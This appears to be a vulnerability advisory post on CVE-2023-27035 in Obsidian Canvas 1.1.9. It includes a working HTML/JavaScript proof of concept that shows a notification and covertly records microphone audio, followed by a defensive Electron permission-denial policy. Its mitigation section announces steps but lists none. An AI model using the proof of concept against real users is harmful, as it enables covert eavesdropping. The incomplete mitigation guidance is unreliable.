CVE-2023-27035: Obsidian Canvas 1.1.9 Allows Remote Attackers to Send Desktop Notifications, Record User Audio and More through Embedded Websites

---
A serious vulnerability has been discovered in Obsidian Canvas 1.1.9 that potentially exposes users to remote attackers. The issue, assigned the identifier CVE-2023-27035, could allow an attacker to send desktop notifications, record user audio, and have other unspecified impacts on the affected system. This post provides an analysis of the vulnerability: an explanation of the issue, the affected versions, a proof-of-concept code snippet, and proposed mitigations to protect users.

Exploit Details

---
Because of an improperly implemented security feature, Obsidian Canvas 1.1.9 allows a remote attacker to act on the user's system through a website embedded in a canvas page. Such an embedded site can send desktop notifications, record the user's audio, and perform other activities that are not explicitly specified. Since this can violate user privacy and lead to theft of personal information, the issue is a high-risk vulnerability.

Affected Versions

---
As of now, Obsidian Canvas version 1.1.9 has been confirmed to be affected by this vulnerability. Earlier versions of the software may also be susceptible to this exploit. Users are recommended to upgrade to the latest available version as soon as possible to mitigate the risk.

Code Snippet

---
The code snippet below is a basic proof of concept for this vulnerability. An attacker could host an embedded website with the following HTML and JavaScript, which sends a desktop notification and records user audio when a user opens a canvas containing that embedded website in the affected version of Obsidian Canvas:

<!DOCTYPE html>
<html>
  <head>
    <title>CVE-2023-27035 PoC</title>
    <script>
      // Ask for the Notification permission if it has not been granted yet,
      // then show a desktop notification. The PoC relies on the affected
      // Obsidian Canvas granting this permission to the embedded site.
      function sendNotification() {
        if (Notification.permission !== "granted") {
          Notification.requestPermission();
        }
        var notification = new Notification("CVE-2023-27035", {
          body: "You have been exploited!"
        });
      }

      // Request microphone access with getUserMedia and record half a second
      // of audio with MediaRecorder. The data handler is registered before
      // start()/stop() so the recorded chunk is not missed.
      function recordAudio() {
        navigator.mediaDevices
          .getUserMedia({audio: true})
          .then(function(stream) {
            var mediaRecorder = new MediaRecorder(stream);
            mediaRecorder.ondataavailable = function(event) {
              // Attacker can access and transmit the recorded data.
            };
            mediaRecorder.start();

            setTimeout(function() {
              mediaRecorder.stop();
            }, 500);
          });
      }

      // Run both as soon as the embedded page has loaded.
      window.onload = function() {
        sendNotification();
        recordAudio();
      };
    </script>
  </head>
  <body>
    <h1>CVE-2023-27035 Proof of Concept</h1>
  </body>
</html>
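The proof of concept above only works because the host application grants browser permissions to embedded web content. Obsidian is built on Electron, where the host decides this through session permission hooks. The following is an added example, not Obsidian's own code, of a deny-by-default policy for embedded content; it assumes an Electron `session` object and uses the documented `setPermissionRequestHandler` and `setPermissionCheckHandler` hooks, with the decision kept in a pure function so it can be tested without Electron.

```javascript
// Added example (not Obsidian's code): deny-by-default browser permissions for
// embedded web content in an Electron host. `session` is assumed to be an
// Electron Session object; the two handler names are the documented Electron API.

// Permissions an untrusted embedded page should never receive silently.
// These are Electron permission strings; "media" covers microphone and camera.
const EMBED_SENSITIVE = new Set([
  "notifications", "media", "display-capture", "geolocation",
  "clipboard-read", "midi", "midiSysex", "pointerLock", "openExternal",
]);

// Pure decision: allow non-sensitive permissions, and sensitive ones only for
// origins on an explicit allow list. A missing or unparseable origin is denied.
function decideEmbedPermission(permission, requestingOrigin, allowedOrigins = []) {
  if (!EMBED_SENSITIVE.has(permission)) return true;
  if (!requestingOrigin) return false;
  return allowedOrigins.includes(requestingOrigin);
}

// Normalise a URL or origin string to its origin; returns "" when it is not a URL.
function originOf(url) {
  try { return new URL(url).origin; } catch (e) { return ""; }
}

// Wire the policy into both hooks: the request handler (prompt time, e.g.
// getUserMedia) and the check handler (query time, e.g. Notification.permission).
function installEmbedPermissionPolicy(session, allowedOrigins = []) {
  session.setPermissionRequestHandler((webContents, permission, callback, details) => {
    const origin = originOf(details && details.requestingUrl);
    callback(decideEmbedPermission(permission, origin, allowedOrigins));
  });
  session.setPermissionCheckHandler((webContents, permission, requestingOrigin) =>
    decideEmbedPermission(permission, originOf(requestingOrigin), allowedOrigins));
}
```

In the host application this would be applied to the session used for embedded content, for example `installEmbedPermissionPolicy(session.fromPartition("persist:embeds"), [])`, so that an embedded page gets neither a notification grant nor a microphone stream unless its origin was deliberately allow-listed.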

Proposed Mitigation

---
The developers of Obsidian Canvas are currently working on implementing a security fix for this issue. Meanwhile, users can take the following steps to protect themselves:

Conclusion

---
In summary, CVE-2023-27035 is a critical vulnerability discovered in Obsidian Canvas 1.1.9. Remote attackers can exploit this issue to send desktop notifications, record user audio, and perform other unspecified activities through embedded websites in canvas pages. Users should stay vigilant and update their software as soon as the patch is released to avoid potential exploitation.

Timeline

Published on: 05/01/2023 22:15:00 UTC
Last modified on: 05/06/2023 03:14:00 UTC